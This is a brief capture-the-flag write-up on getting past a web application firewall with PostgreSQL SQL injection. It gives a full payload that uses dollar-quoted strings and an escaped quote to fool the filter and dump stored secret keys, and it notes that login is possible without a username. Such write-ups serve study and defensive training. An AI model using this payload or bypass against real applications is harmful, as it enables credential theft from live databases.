Tags: sqli waf postgresql
Rating: 5.0
You can log in to the app by supplying a random password without a username.
The application is a simple search functionality with sql injection & waf.
I was able to bypass the WAF by using postgresql custom strings (`$sth$string$sth$` is equal to `'string'`).
payload: `name=';select+$a$sth$a$,string_agg(secret_key,',')+from+target_credentials+where+($x$12345\'$x$=$w$abcd$w$+or+1=1)+and+1!='2`
;**select**` $a$sth$a$,string_agg(secret_key,',')` **from target_credentials where** (`$x$12345\'$x$=$w$abcd$w$` or 1=1) and 1!='2
I confused the WAF with the additional escaped quote within the `$x$` string. Looks like the WAF sees the first part (before that escaped quote) as a string and therefore thinks that the query is safe.